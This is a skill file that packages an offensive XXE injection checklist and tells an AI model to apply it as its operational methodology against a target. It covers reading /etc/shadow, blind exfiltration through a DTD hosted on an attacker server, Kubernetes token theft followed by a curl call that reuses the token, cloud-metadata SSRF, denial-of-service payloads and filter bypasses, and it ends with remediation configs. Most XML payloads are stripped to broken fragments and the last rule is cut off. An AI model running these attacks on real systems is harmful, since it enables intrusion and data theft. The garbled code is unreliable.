# SKILL: XML External Entity (XXE) Injection ## Metadata - **Skill Name**: xxe - **Folder**: offensive-xxe - **Source**: https://github.com/SnailSploit/offensive-checklist/blob/main/xxe.md ## Description XML External Entity injection testing checklist: classic XXE, blind XXE (out-of-band), XXE via file upload (SVG/docx), XXE in SOAP/REST, error-based XXE, XInclude attacks, and XXE filter bypass. Use for web app XXE testing and bug bounty. ## Trigger Phrases Use this skill when the conversation involves any of: `XXE, XML external entity, blind XXE, out-of-band XXE, XXE file upload, SVG XXE, SOAP XXE, XInclude, entity bypass, XXE SSRF, XXE file read` ## Instructions for Claude When this skill is active: 1. Load and apply the full methodology below as your operational checklist 2. Follow steps in order unless the user specifies otherwise 3. For each technique, consider applicability to the current target/context 4. Track which checklist items have been completed 5. Suggest next steps based on findings --- ## Full Methodology # XML External Entity (XXE) Injection ## Shortcut - Find data entry points that you can use to submit XML data. - Determine whether the entry point is a candidate for a classic or blind XXE. The endpoint might be vulnerable to classic XXE if it returns the parsed XML data in the HTTP response. If the endpoint does not return results, it might still be vulnerable to blind XXE, and you should set up a callback listener for your tests. - Try out a few test payloads to see if the parser is improperly configured. In the case of classic XXE, you can check whether the parser is processing external entities. In the case of blind XXE, you can make the server send requests to your callback listener to see if you can trigger outbound interaction. - Try to exfiltrate a common system file, like /etc/hostname. - You can also try to retrieve some more sensitive system files, like /etc/shadow or ~/.bash_history. - If you cannot exfiltrate the entire file with a simple XXE payload, try to use an alternative data exfiltration method. - See if you can launch an SSRF attack using the XXE. ## Mechanisms XML External Entity (XXE) is a vulnerability that occurs when XML parsers process external entity references within XML documents. XXE attacks target applications that parse XML input and can lead to: - Disclosure of confidential files and data - Server-side request forgery (SSRF) - Denial of service attacks - Remote code execution in some cases ```mermaid flowchart TD A[XXE Vulnerability] --> B[File Disclosure] A --> C[SSRF] A --> D[Denial of Service] A --> E[Remote Code Execution] B -->|"Access to"| B1[System Files] B -->|"Access to"| B2[Application Configs] B -->|"Access to"| B3[Database Credentials] C -->|"Access to"| C1[Internal Services] C -->|"Access to"| C2[Cloud Metadata] C -->|"Access to"| C3[External Resources] D -->|"Via"| D1[Billion Laughs] D -->|"Via"| D2[Quadratic Blowup] D -->|"Via"| D3[External Resource DoS] E -->|"Via"| E1[PHP Expect] E -->|"Via"| E2[Java Deserialization] ``` XXE vulnerabilities arise from XML's Document Type Definition (DTD) feature, which allows defining entities that can reference external resources. When a vulnerable XML parser processes these entities, it retrieves and includes the external resources, potentially exposing sensitive information. In practice, full remote code execution rarely stems from XXE alone; it typically requires language-specific gadgets—such as PHP's `expect://` wrapper or Java deserialization sinks—which XXE merely helps reach. ```mermaid sequenceDiagram actor A as Attacker participant C as Client participant S as Server participant X as XML Parser participant FS as File System A->>C: Craft malicious XML with XXE payload C->>S: Submit XML document S->>X: Pass XML for parsing X->>FS: Resolve external entity reference FS->>X: Return sensitive file content X->>S: Include file content in parsed result S->>C: Return response with sensitive data C->>A: Attacker views sensitive data ``` Types of XXE attacks include: - **Classic XXE**: Direct extraction of data visible in responses - **Blind XXE**: No direct output, but data can be exfiltrated through out-of-band techniques - **Error-based XXE**: Leveraging error messages to extract data - **XInclude-based XXE**: Using XInclude when direct DTD access is restricted ```mermaid flowchart LR A[XXE Attack Types] --> B[Classic XXE] A --> C[Blind XXE] A --> D[Error-based XXE] A --> E[XInclude-based XXE] B -->|"Direct Output"| B1[Response contains file content] C -->|"Out-of-Band"| C1[Data exfiltration via callbacks] D -->|"Error Messages"| D1[Data in error output] E -->|"XInclude"| E1[Alternative to DTD] ``` ## Hunt ### Finding XXE Vulnerabilities #### Additional Discovery Methods - Convert content type from "application/json"/"application/x-www-form-urlencoded" to "application/xml" - Check file uploads that allow docx/xlsx/pdf/zip - unzip the package and add XML code into the XML files - Test SVG file uploads for XML injection - Check RSS feeds functionality for XML injection - Fuzz for /soap API endpoints - Test SSO integration points for XML injection in SAML requests/responses #### Identify XML Injection Points ```mermaid flowchart TD A[XML Injection Points] --> B[API Endpoints] A --> C[File Uploads] A --> D[Format Conversion] A --> E[Legacy Interfaces] A --> F[Hidden XML Parsers] A --> G[Content-Type Conversion] B --> B1[REST APIs] B --> B2[GraphQL] C --> C1[XML Files] C --> C2[DOCX/XLSX] C --> C3[SVG Images] C --> C4[PDF Files] D --> D1[JSON to XML] D --> D2[CSV to XML] E --> E1[SOAP] E --> E2[XML-RPC] E --> E3[SAML] F --> F1[Hidden Parameters] F --> F2[Legacy Code] G --> G1[JSON endpoints accepting XML] ``` - **API Endpoints**: Look for endpoints accepting XML data - **File Uploads**: Features accepting XML-based files (DOCX, SVG, XML, etc.) - **Format Conversion**: Services converting to/from XML formats - **Legacy Interfaces**: SOAP web services, XML-RPC - **Hidden XML Parsers**: Look for parameters that might be processed as XML behind the scenes - **Content Type Conversion**: Endpoints that accept JSON but may process XML with proper Content-Type #### Test Basic XXE Patterns For each potential injection point, test with simple payloads: - **Classic XXE (file retrieval)**: ```xml ]> &xxe; ``` or ```xml %test; ]> &test; ``` - **Blind XXE (out-of-band detection)**: ```xml %xxe; ]> test ``` - **XInclude attack** (when unable to define a DTD): ```xml ``` #### Billion Laughs Attack Steps 1. Capture the request in your proxy tool 2. Send it to repeater and convert body to XML format 3. Check the Accept header and modify to Application/xml if needed 4. Convert JSON to XML if no direct XML input is possible 5. Insert the billion laughs payload between XML tags 6. Adjust entity references (lol1 to lol9) to control DoS intensity #### Check Alternative XML Formats - **SVG files**: ```xml ]> &xxe; ``` or ```xml ]> &test; ``` - **DOCX/XLSX files**: Modify internal XML files (e.g., word/document.xml) - **SOAP messages**: Test XXE in SOAP envelope #### SAML 2.0 XXE Testing SAML assertions are prime XXE targets. Test both requests and responses: **AuthnRequest XXE:** ```xml ]> &xxe; ``` **Response Assertion XXE:** ```xml ]> &xxe; ``` **Encrypted Assertion XXE (Response Wrapping):** ```xml %dtd;]> ... ``` #### E-book Format Exploitation (EPUB) EPUB files are ZIP archives containing XML. Target library management systems and e-reader apps: ```xml ]> &xxe; ``` **Attack workflow:** 1. Create legitimate EPUB file 2. Extract contents (it's a ZIP) 3. Inject XXE into `META-INF/container.xml` or `content.opf` 4. Re-zip and upload to target (library systems, e-commerce platforms) #### Apple Universal Links XXE iOS deep linking configuration files: ```xml ]> &xxe; ``` ### Advanced XXE Hunting #### Parameter Entity Testing ```xml "> %eval; %exfil; ]> test ``` #### Error-Based XXE ```xml "> %eval; %error; ]> test ``` #### XXE via Content-Type Manipulation Try changing Content-Type header from: ``` Content-Type: application/json ``` to: ``` Content-Type: application/xml ``` or: ``` Content-Type: text/xml ``` ## Chaining and Escalation ### Cloud-Native & Kubernetes XXE #### Kubernetes Admission Webhook XXE ValidatingWebhookConfiguration and MutatingWebhookConfiguration receive XML-formatted requests: ```yaml # Vulnerable admission webhook apiVersion: v1 kind: Pod metadata: name: evil-pod annotations: # Webhook receives and parses this XML config: | ]> &xxe; ``` **Exploitation flow:** ```bash # 1. Create pod with XXE payload in annotation kubectl apply -f evil-pod.yaml # 2. Admission webhook receives XML, processes with vulnerable parser # 3. Service account token exfiltrated # 4. Use token for privilege escalation curl -k https://kubernetes.default.svc/api/v1/namespaces/default/pods \ -H "Authorization: Bearer $(cat token)" ``` **ConfigMap XXE:** ```yaml apiVersion: v1 kind: ConfigMap metadata: name: xxe-config data: config.xml: | ]> &xxe; ``` #### CI/CD Pipeline XXE **Jenkins XML Config Parsing:** ```xml ]> &xxe; ``` **GitLab CI Artifact Processing:** ```yaml # .gitlab-ci.yml test: script: - echo ']>&xxe;' > report.xml artifacts: reports: junit: report.xml # Parsed by GitLab ``` **GitHub Actions Workflow:** ```yaml # Vulnerable action that processes XML artifacts - name: Parse XML Report uses: vulnerable/xml-parser@v1 with: xml-file: | ]> &xxe; ``` **Maven/Gradle Dependency Confusion:** ```xml ]> 4.0.0 &xxe; ``` ### Parser Misconfigurations - **DTD Processing Enabled**: XML parsers with DTD processing enabled - **External Entity Resolution**: Parsers allowing external entity references - **XInclude Support**: Enabled processing of XInclude statements - **Missing Entity Validation**: No validation of entity expansion ### File Disclosure via XXE - **Local File Access**: Reading sensitive system files - `/etc/passwd` (Unix user information) - `/etc/shadow` (password hashes on Linux) - `C:\Windows\system32\drivers\etc\hosts` (Windows hosts file) - Application configuration files - Source code files - Database credentials ### SSRF via XXE ```mermaid sequenceDiagram actor A as Attacker participant S as Vulnerable Server participant I as Internal Service participant C as Cloud Metadata A->>S: Submit XXE payload targeting internal service S->>I: Make request to internal service I->>S: Return internal service response S->>A: Return parsed result with internal data A->>S: Submit XXE payload targeting cloud metadata S->>C: Request cloud metadata (169.254.169.254) C->>S: Return sensitive cloud information S->>A: Return parsed result with cloud data ``` - **Internal Network Access**: Scanning internal systems - **Cloud Metadata Access**: Accessing metadata services **AWS IMDSv2** (Token-based, harder via XXE): ```xml ]> ``` **Azure Instance Metadata**: ```xml ]> ``` **GCP Metadata v2 (2024+)**: ```xml ]> ``` **Workarounds for header-protected metadata:** ```xml ]> ]> ``` ### Denial of Service - **Billion Laughs Attack**: Exponential entity expansion ```xml ]> &lol3; ``` - **Quadratic Blowup Attack**: Large string repeating ```xml ]> &a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a; ``` - **External Resource DoS**: Loading large or never-ending external resources ## Bypass Techniques ### Filter Evasion Techniques - **Case Variation**: ```xml ]> ``` - **Alternative Protocol Schemes**: ``` file:/// php://filter/convert.base64-encode/resource= gopher:// jar:// netdoc:// ``` - **URL Encoding**: ```xml ]> ``` ### XXE in CDATA Sections ```xml "> %eval; %exfil; ]>]]> ``` ### XXE via XML Namespace ```xml ``` ### PHP Wrapper inside XXE ```xml ]> Jean &xxe; Dupont 00 11 22 33 44
42 rue du CTF
75000 Paris
``` ```xml ]> &xxe; ``` ## Methodologies ### Tools #### XXE Detection and Exploitation Tools - **OWASP ZAP**: XML External Entity scanner - **Burp Suite Pro**: XXE scanner extension - **XXEinjector**: Automated XXE testing tool - **XXE-FTP**: Out-of-band XXE exploitation framework - **dtd.gen**: DTD generator for XXE exfiltration - **oxml_sec**: Tool for testing XXE in OOXML files (docx, xlsx, pptx) - **Burp Suite Pro 2025.2+ (“Burp AI”)**: automatically chains scanner-found XXE with out-of-band callbacks for quicker triage. - **Semgrep rules (java-xxe, python-xxe)**: static analysis that flags un-hardened XML parser usage. #### Setup Tools for Out-of-Band Testing - **Interactsh**: Interaction collection server - **Burp Collaborator**: For out-of-band data detection - **XSS Hunter**: Can be repurposed for XXE callbacks - **SimpleHTTPServer**: Quick Python HTTP server setup ### Testing Methodologies ```mermaid flowchart TD A[XXE Testing Methodology] --> B[Identify XML Processing Points] B --> C[Setup Out-of-Band Detection] C --> D[Test Basic XXE Payloads] D --> E[Analyze Results] E --> F[Exploit Vulnerability] F --> G[Expand Attack] B --> B1[API Endpoints] B --> B2[File Uploads] B --> B3[SOAP/Legacy Interfaces] C --> C1[Burp Collaborator] C --> C2[Custom HTTP Server] C --> C3[Interactsh] D --> D1[Classic XXE] D --> D2[Blind XXE] D --> D3[Error-based XXE] D --> D4[XInclude Attack] E --> E1[Direct Data Exposure] E --> E2[HTTP Callbacks] E --> E3[Error Messages] F --> F1[Local File Reading] F --> F2[SSRF] F --> F3[Advanced Exfiltration] G --> G1[Sensitive Data] G --> G2[Internal Network] G --> G3[RCE Attempt] ``` #### Basic Testing Process 1. **Identify XML Processing**: Locate endpoints accepting XML input 2. **Setup Monitoring**: Prepare out-of-band detection for blind XXE 3. **Injection Testing**: Test with basic XXE payloads 4. **Result Analysis**: Check for direct data exposure or callbacks 5. **Vulnerability Confirmation**: Attempt to read a harmless file like `/etc/hostname` #### Advanced Exploitation Techniques ##### Data Exfiltration (for Blind XXE) ```mermaid sequenceDiagram actor A as Attacker participant AS as Attacker Server (DTD) participant VS as Vulnerable Server participant FS as File System A->>AS: Host malicious DTD file A->>VS: Submit XML with reference to external DTD VS->>AS: Request malicious DTD AS->>VS: Deliver DTD with file reading & exfiltration VS->>FS: Read sensitive file Note over VS: Process DTD instructions VS->>AS: Make callback with file content in URL AS->>A: Log request with exfiltrated data ``` 1. Host a malicious DTD file on your server: ```xml "> %eval; %exfil; ``` 2. Use an XXE payload that references your DTD: ```xml %dtd; ]> test ``` ##### XXE OOB with DTD and PHP filter Payload: ```xml %sp; %param1; ]> &exfil; ``` External DTD (`http://your-attacker-server.com/dtd.xml`): ```dtd "> ``` ##### Error-Based Exfiltration 1. Host a malicious DTD with error-based exfiltration: ```xml "> %eval; %error; ``` ##### XXE for SSRF Use XXE to trigger internal requests: ```xml ]> ``` ##### XXE Inside SOAP ```xml %dtd;]>]]> ``` ##### XXE PoC Examples ```xml ]>&xxe_test; ``` ```xml ]>&xxe_test; ``` ```xml ]>&xxe_test; ``` ##### XXE via File Upload (SVG Example) Create an SVG file with the payload: ```xml ]> &xxe; ``` Upload it where SVG is allowed (e.g., profile picture, comment attachment). #### Comprehensive XXE Testing Checklist 1. **Basic entity testing**: - Test file access via `file://` protocol - Test network access via `http://` protocol 2. **Content delivery**: - Direct XXE with immediate results - Out-of-band XXE with remote DTD - Error-based XXE for data extraction 3. **Protocol testing**: - Test various protocols (file, http, https, ftp, etc.) - Attempt restricted protocol access 4. **Format variations**: - Test XXE in SVG uploads - Test XXE in document formats (DOCX, XLSX, PDF) - Test SOAP/XML-RPC interfaces 5. **Bypasses**: - Try character encoding tricks - Use nested entities - Apply URL encoding - Test with namespace manipulations ## Remediation Recommendations - Disable DTD processing completely if possible - Disable external entity resolution - Implement proper input validation - Use safe XML parsers that disable XXE by default - Apply patch management to XML parsers - Use newer API formats like JSON where feasible - **Network egress allow-list**: Restrict outbound traffic from XML-parsing hosts to block blind-XXE callbacks. - **API Gateway XML Protection**: Implement XML threat protection at the gateway layer ### API Gateway XML Threat Protection #### AWS API Gateway ```yaml # API Gateway Request Validator RequestValidator: Type: AWS::ApiGateway::RequestValidator Properties: ValidateRequestBody: true ValidateRequestParameters: true # Lambda authorizer to inspect XML def lambda_handler(event, context): body = event.get('body', '') # Block DTD declarations if ' 100000: # 100KB return { 'statusCode': 413, 'body': 'Request too large' } ``` #### Kong Gateway ```yaml plugins: - name: xml-threat-protection config: source_size_limit: 1000000 # 1MB max name_size_limit: 255 # Max element name length child_count_limit: 100 # Max child elements attribute_count_limit: 50 # Max attributes per element entity_expansion_limit: 0 # Disable entity expansion external_entity_limit: 0 # Disable external entities dtd_processing: false # Disable DTD ``` #### Apigee Edge ```xml request 10 5 3 10 1000 100 100 500 500 ``` #### Nginx + ModSecurity ```nginx # ModSecurity rules for XXE SecRule REQUEST_BODY "@rx